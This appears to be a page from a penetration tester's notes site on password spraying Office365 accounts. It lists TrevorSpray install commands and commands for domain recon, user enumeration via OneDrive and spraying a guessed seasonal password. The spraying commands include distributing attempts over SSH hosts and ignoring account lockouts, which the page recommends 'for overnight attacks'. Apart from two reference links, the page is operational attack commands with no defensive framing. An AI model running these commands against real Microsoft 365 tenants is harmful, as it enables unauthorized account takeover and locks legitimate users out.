search
Personal BlogTwitterGitHubContact

Office365

A list of tools and resources that I use for password spraying Microsoft products.

hashtag
Password Spraying Office365

hashtag
TrevorSpray

When using TrevorSpray, consider important factors such as the delay. In my experience, setting the delay to around 100 seconds across multiple hosts has not resulted in a delay ever. 

# Installation
pip install git+https://github.com/blacklanternsecurity/trevorproxy
pip install git+https://github.com/blacklanternsecurity/trevorspray

# Perform recon against a domain
trevorspray --recon $domain

# Enumerate users via OneDrive
trevorspray --recon $domain -u $emails --threads 3

# Spray with a 10 second delay between requests
trevorspray -u $validemails -p 'Winter2022!' --delay 10

# Spray with two robins and the current system
trevorspray -u $validemails -p 'Winter2022!' --ssh root@$robin root@$robin

# Spray while ignoring account lockout (good for overnight attacks)
trevorspray -u $validemails -p $passwords --ignore-lockouts

hashtag
Identifying Emails without OSINT

LogoGitHub - blacklanternsecurity/TREVORspray: TREVORspray is a modular password sprayer with threading, clever proxying, loot modules, and more!GitHubchevron-right

hashtag
References

LogoPassword spraying and MFA bypasses in the modern security landscapeSprocket Securitychevron-right
PreviousExchangeNextOkta

Last updated